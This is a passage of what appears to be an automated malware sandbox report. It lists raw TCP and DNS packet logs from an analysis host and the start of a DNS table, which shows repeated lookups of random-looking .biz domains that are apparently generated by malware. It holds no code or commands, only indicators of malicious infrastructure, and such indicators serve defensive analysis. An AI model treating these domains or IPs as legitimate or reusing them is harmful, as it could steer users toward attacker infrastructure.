                                                                                                                                                                                                    Nov 22, 2024 18:55:09.302309990 CET804970954.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.305367947 CET4970980192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.325437069 CET4970980192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.444957018 CET804970954.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.148200989 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.268903971 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.268987894 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.300566912 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.300607920 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.420131922 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.420144081 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.737875938 CET8049710132.226.8.169192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.747299910 CET4971080192.168.2.5132.226.8.169
                                                                                                                                                                                                    Nov 22, 2024 18:55:10.873557091 CET8049710132.226.8.169192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.250415087 CET8049710132.226.8.169192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.295030117 CET4971080192.168.2.5132.226.8.169
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.415122032 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.415220022 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.415273905 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.432121038 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.552423000 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.734770060 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.734822989 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.735198975 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.741532087 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.741554022 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.123461962 CET4971380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.242959023 CET8049713172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.243058920 CET4971380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.244936943 CET4971380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.245002985 CET4971380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.364705086 CET8049713172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.364742994 CET8049713172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.011832952 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.011961937 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.023066998 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.023092031 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.023356915 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.105104923 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.147351980 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.459681988 CET8049713172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.459747076 CET4971380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.476588964 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.476650953 CET44349712104.21.67.152192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.477521896 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.483557940 CET49712443192.168.2.5104.21.67.152
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.522862911 CET4971380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.590361118 CET4971480192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.642324924 CET8049713172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.709901094 CET8049714172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.710356951 CET4971480192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.710709095 CET4971480192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.711075068 CET4971480192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.830173016 CET8049714172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:13.830548048 CET8049714172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.887919903 CET8049714172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.887993097 CET4971480192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.916383028 CET4971480192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.036125898 CET8049714172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.651679039 CET4971580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.771190882 CET804971554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.771284103 CET4971580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.779052019 CET4971580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.779221058 CET4971580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.900314093 CET804971554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.900489092 CET804971554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.917031050 CET4971780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.036555052 CET804971718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.036900997 CET4971780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.047712088 CET4971780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.047730923 CET4971780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.168818951 CET804971718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:16.168859959 CET804971718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.183105946 CET804971554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.183252096 CET804971554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.183654070 CET4971580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.456662893 CET4971580192.168.2.554.244.188.177
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.576278925 CET804971554.244.188.177192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.715266943 CET4971980192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.834852934 CET804971918.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.835021019 CET4971980192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.842711926 CET4971980192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.842730999 CET4971980192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.962272882 CET804971918.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.962292910 CET804971918.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.095194101 CET804971718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.095468998 CET804971718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.095607996 CET4971780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.097882032 CET4971780192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.217849016 CET804971718.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.949023962 CET804971918.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.949093103 CET804971918.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.949167013 CET4971980192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.332747936 CET4972780192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.452295065 CET804972782.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.452389002 CET4972780192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.453571081 CET4972780192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.453596115 CET4972780192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.573189020 CET804972782.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:20.573199987 CET804972782.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:21.008872986 CET4971980192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.407888889 CET804972782.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.408049107 CET4972780192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.408049107 CET4972780192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.528206110 CET804972782.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.849489927 CET4978280192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.969213009 CET804978282.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.969364882 CET4978280192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.969852924 CET4978280192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:42.970025063 CET4978280192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:55:43.089822054 CET804978282.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:43.089852095 CET804978282.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:04.933104038 CET804978282.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:04.935286045 CET4978280192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:04.935336113 CET4978280192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:05.056130886 CET804978282.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.016141891 CET4983380192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.135847092 CET804983382.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.136096954 CET4983380192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.142081022 CET4983380192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.142081022 CET4983380192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.261861086 CET804983382.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:06.261921883 CET804983382.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:16.250449896 CET8049710132.226.8.169192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:16.250523090 CET4971080192.168.2.5132.226.8.169
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.105238914 CET804983382.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.107099056 CET4983380192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.107209921 CET4983380192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.187022924 CET4988480192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.226869106 CET804983382.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.310697079 CET804988482.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.311278105 CET4988480192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.311450958 CET4988480192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.311466932 CET4988480192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.431734085 CET804988482.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:28.431797028 CET804988482.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.237118006 CET804988482.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.239243031 CET4988480192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.239281893 CET4988480192.168.2.582.112.184.197
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.360415936 CET804988482.112.184.197192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.888180017 CET4993580192.168.2.547.129.31.212
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.008130074 CET804993547.129.31.212192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.008634090 CET4993580192.168.2.547.129.31.212
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.008776903 CET4993580192.168.2.547.129.31.212
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.008891106 CET4993580192.168.2.547.129.31.212
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.128213882 CET804993547.129.31.212192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.128355980 CET804993547.129.31.212192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.264054060 CET4971080192.168.2.5132.226.8.169
                                                                                                                                                                                                    Nov 22, 2024 18:56:51.463366032 CET8049710132.226.8.169192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.059329033 CET804993547.129.31.212192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.059396029 CET804993547.129.31.212192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.059478998 CET4993580192.168.2.547.129.31.212
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.059587955 CET4993580192.168.2.547.129.31.212
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.180104971 CET804993547.129.31.212192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.689692020 CET4994280192.168.2.513.251.16.150
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.811608076 CET804994213.251.16.150192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.811685085 CET4994280192.168.2.513.251.16.150
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.815355062 CET4994280192.168.2.513.251.16.150
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.815382957 CET4994280192.168.2.513.251.16.150
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.936094999 CET804994213.251.16.150192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.936113119 CET804994213.251.16.150192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:55.906182051 CET804994213.251.16.150192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:55.906294107 CET804994213.251.16.150192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:55.906346083 CET4994280192.168.2.513.251.16.150
                                                                                                                                                                                                    Nov 22, 2024 18:56:55.906390905 CET4994280192.168.2.513.251.16.150
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.026204109 CET804994213.251.16.150192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.478804111 CET4994980192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.598510027 CET804994944.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.598596096 CET4994980192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.598767996 CET4994980192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.598787069 CET4994980192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.718363047 CET804994944.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.718385935 CET804994944.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.871642113 CET804994944.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.871809006 CET804994944.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.871887922 CET4994980192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.873325109 CET4994980192.168.2.544.221.84.105
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.993232012 CET804994944.221.84.105192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.623195887 CET4995580192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.747545004 CET804995518.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.747631073 CET4995580192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.747802973 CET4995580192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.747802973 CET4995580192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.873342037 CET804995518.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.873460054 CET804995518.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.855160952 CET804995518.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.855334044 CET804995518.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.855402946 CET4995580192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.864017963 CET4995580192.168.2.518.141.10.107
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.983552933 CET804995518.141.10.107192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.378706932 CET4996380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.498483896 CET8049963172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.498761892 CET4996380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.500308037 CET4996380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.500308037 CET4996380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.619966030 CET8049963172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.619986057 CET8049963172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.675498009 CET8049963172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.679374933 CET4996380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.681428909 CET4996580192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.681432009 CET4996380192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.801759005 CET8049963172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.801786900 CET8049965172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.801917076 CET4996580192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.802057028 CET4996580192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.802097082 CET4996580192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.921668053 CET8049965172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:02.921705008 CET8049965172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:03.990151882 CET8049965172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:03.990263939 CET4996580192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:03.990345955 CET4996580192.168.2.5172.234.222.143
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.110080004 CET8049965172.234.222.143192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.749245882 CET4997180192.168.2.534.246.200.160
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.869160891 CET804997134.246.200.160192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.871053934 CET4997180192.168.2.534.246.200.160
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.871220112 CET4997180192.168.2.534.246.200.160
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.871248007 CET4997180192.168.2.534.246.200.160
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.990961075 CET804997134.246.200.160192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.991092920 CET804997134.246.200.160192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.344959021 CET804997134.246.200.160192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.345004082 CET804997134.246.200.160192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.345071077 CET4997180192.168.2.534.246.200.160
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.345144033 CET4997180192.168.2.534.246.200.160
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.464921951 CET804997134.246.200.160192.168.2.5
                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Nov 22, 2024 18:55:00.627748966 CET6052053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.357222080 CET53605201.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.782211065 CET5335353192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.925343990 CET53533531.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.534252882 CET5579053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.679636955 CET53557901.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.905677080 CET6053453192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:04.484926939 CET53605341.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.188369989 CET6373053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.325177908 CET53637301.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:06.893671989 CET6377253192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.470069885 CET53637721.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.841943979 CET6107753192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:07.988662004 CET53610771.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.412333012 CET4999953192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:09.981972933 CET53499991.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.262392044 CET5334153192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.476964951 CET5080653192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:11.730281115 CET53533411.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:12.099250078 CET53508061.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.769229889 CET5888053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.907454967 CET53588801.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:14.952399015 CET5691353192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.177236080 CET53569131.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.181989908 CET5483353192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:15.735441923 CET53548331.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.485256910 CET6046853192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:17.628526926 CET53604681.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.153436899 CET6524453192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.554524899 CET53652441.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.573723078 CET5877653192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.808522940 CET53587761.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:18.838020086 CET5672053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.830667019 CET53567201.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.842780113 CET5672053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:55:19.983797073 CET53567201.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:05.025912046 CET5106853192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:56:05.967082024 CET53510681.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.239949942 CET5301953192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:56:50.882004976 CET53530191.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.060266972 CET5142953192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:56:53.682539940 CET53514291.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:55.907071114 CET5840753192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:56:56.450983047 CET53584071.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:56:57.874224901 CET6320553192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:56:58.617075920 CET53632051.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:00.865098953 CET5221653192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:57:01.372210979 CET53522161.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:03.991084099 CET6231053192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:57:04.742625952 CET53623101.1.1.1192.168.2.5
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.345659971 CET5692553192.168.2.51.1.1.1
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.901895046 CET53569251.1.1.1192.168.2.5
                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                    Nov 22, 2024 18:55:00.627748966 CET192.168.2.51.1.1.10x4641Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:01.782211065 CET192.168.2.51.1.1.10xc6bcStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:02.534252882 CET192.168.2.51.1.1.10x2a39Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:03.905677080 CET192.168.2.51.1.1.10x9c19Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 22, 2024 18:55:05.188369989 CET192.168.2.51.1.1.10x10faStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
